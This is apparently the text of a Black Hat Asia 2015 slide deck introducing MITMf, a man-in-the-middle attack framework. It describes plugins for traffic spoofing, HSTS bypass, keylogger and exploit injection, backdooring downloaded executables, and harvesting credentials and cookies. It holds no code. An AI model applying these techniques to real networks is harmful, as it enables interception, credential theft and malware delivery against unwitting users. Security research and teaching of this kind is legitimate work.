MITMf:
The swiss-army knife
for Man-In-The-Middle Attacks
whoami
@byt3bl33d3r
https://github.com/byt3bl33d3r
http://sign0f4.blogspot.it/
Contributed to the Veil-Framework, Kali-Nethunter and more..
Student
So why do we need another MITM tool?
Stuck in dependencie hell
Not really designed to be an attack platform
Good for MITM
Unreliable when modifying traffic
Not easily extendible
Out of date
Too low level
Never got this to work properly
GUI seems broken
Do we even need a GUI?
How did this get started?
I JUST WANT SOMETHING TO RELIABLY INJECT IFRAMES!!!!!
OMG!!
So I Google'd like there was no tomorrow until I came across this:
I feel your pain bro...
Sergio wut??
Created by Ben Schmidt (@_supernothing)
http://spareclockcycles.org/
Buy him a drink!
For those wondering, it stands for: Super Effective Recorder of Gathered Inputs and Outputs
A modified version of Moxie Marlinspike's SSLstrip tool
Hooks core functions in SSLstrip to modify traffic
Extremely easy to extend and build upon
So problem solved right?
Well not really...
A lot of the plugins relied on external tools (e.g. Ettercap, Metasploit etc..)
Some plugins were very limited in their functionality and were a bit outdated
Lots of bugs to squash
Wierd name but sounds promising!
What I wanted out of it
No reliance on external tools
Verbosity and logging
Minimize dependencies as much as possible (I truly tried..)
BeEF and Metasploit integration via their respective API and RPC's
Learn from other projects mistakes!
MITMf v0.9.5
AppCachePoison
JSkeylogger
Inject
Spoof
Filepwn
CacheKill
BeEFAutorun
JavaPwn
Replace
Responder
Upsidedownternet
BrowserProfiler
SMBAuth
SSLstrip+
SessionHijacker
Sniffer
Spoof
Originally used Ettercap
Completely re-written, now uses Scapy
Added support for ICMP, ARP req, ARP rep, DHCP
Supports DNS tampering (DNS spoofing on steroids)
When DHCP spoofing can exploit the ShellShock vuln!
Inject
DEMO!
Replace
Written by @rubenthijssen (Thanks man!)
Replaces strings in HTML content
BrowserProfiler
Injects a JS script to enumerate all browser plugins
Uses PluginDetect to precisely get the installed Java plugin version
http://www.pinlady.net/PluginDetect
JavaPwn
Uses the BrowserProfiler plugin to enumerate the Java Plugin version
Connects to Metasploit using it's MSGRPC interface
Uses SpiderLabs msfrpc to facilitate communication with Metasploit, original code had a bug, fixed it, you can find it here
https://github.com/byt3bl33d3r/msfrpc
Automatically sets up correct exploits, and injects iframes to trigger them
DEMO!
BeEFAutorun
Born out of frustration from using the beef_injection_framework
Automatically injects BeEF hooks
Uses BeEFAPI
https://github.com/byt3bl33d3r/beefapi
for interfacing with BeEF's RESTfulAPI
Fingerprints OS, Browser and runs modules specified in the config file
FilePwn
Let's pause for a moment too understand how cool this is
Huge shout-out to @midnite_runr
Uses BDFactory to transparently "patch" executables going over HTTP
You can check out BDFactory at:
https://github.com/secretsquirrel/the-backdoor-factory
The plugin uses code from BDFproxy:
https://github.com/secretsquirrel/BDFProxy
JSKeylogger
Injects the JS keylogger found in the http_javascript_keylogger Metasploit module
Modified to work somewhat on mobile devices
Responder
Responder integration into MITMf brings the framework to a whole new level
NBTNS/LLMNR spoof , act a a WPAD rougue server and more!
Shout out to Laurent Gaffie for letting me do this!
SSLstrip+
Uses Leonardo Nve's technique for partially bypassing HSTS as demonstrated last year at BHAsia
(buy him a drink!)
App Cache Poison
Implements Krzysztof Kotowicz (@kkotowicz) response tampering attacks
Places web pages in browsers long-lasting HTML5 AppCache so that the browser will continue to receive the modified page even when no longer MITM'd
Upsidedownternet
For the lulz
Flips images 180 degrees
Gahhh! Vodoo?? No...
Browser requests
http://
www
.google.com
Returns redirect to
http://
wwww
.google.com
DNS request gets intercepted and
www
.google.com
is mirrored to
wwww
.google.com
We then re-write all links to the alternate domain
Client continues in plain-text since browser has no HSTS setting for
wwww
.google.com
Hallelujah!
Sniffer
A port of Dan McInerney's (@DanHMcInerney) Net-Creds script
https://github.com/DanMcInerney/net-creds
Sniffs passwords, hashes and search engine queries
TCP Re-Assembly aware
Doesn't rely on ports for service identification
Currently supports: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc..) and Kerberos
But Dude! I want some shells ! <3
I got you covered!
Injects anything you want into HMTL!
Looking into the crystal ball...
Evilgrade and Snarf integration
Actual SSL/TLS support
SSLsplit like functionality
MITM RDP connections (almost done)
More protocol level attacks (Yersinia)
More HSTS bypasses
Session Hijacker
Automatically stores captured cookies in a firefox profile ,uses code from Firelamb:
https://github.com sensepost/mana/tree/master/firelamb
Alternatively can send the cookies to the "Mallory cookie injector" Browser Extension
SMBAuth
Injects Iframes with UNC paths to evoke SMB challenge-response attempts
Present Remotely
Send the link below via email or IM
Present to your audience
- Invited audience members will follow you as you navigate and present
- People invited to a presentation do not need a Prezi account
- This link expires 10 minutes after you close the presentation
- A maximum of 30 users can follow your presentation
- Learn more about this feature in our knowledge base article
MITMf BHASIA 2015
No description
by
Tweet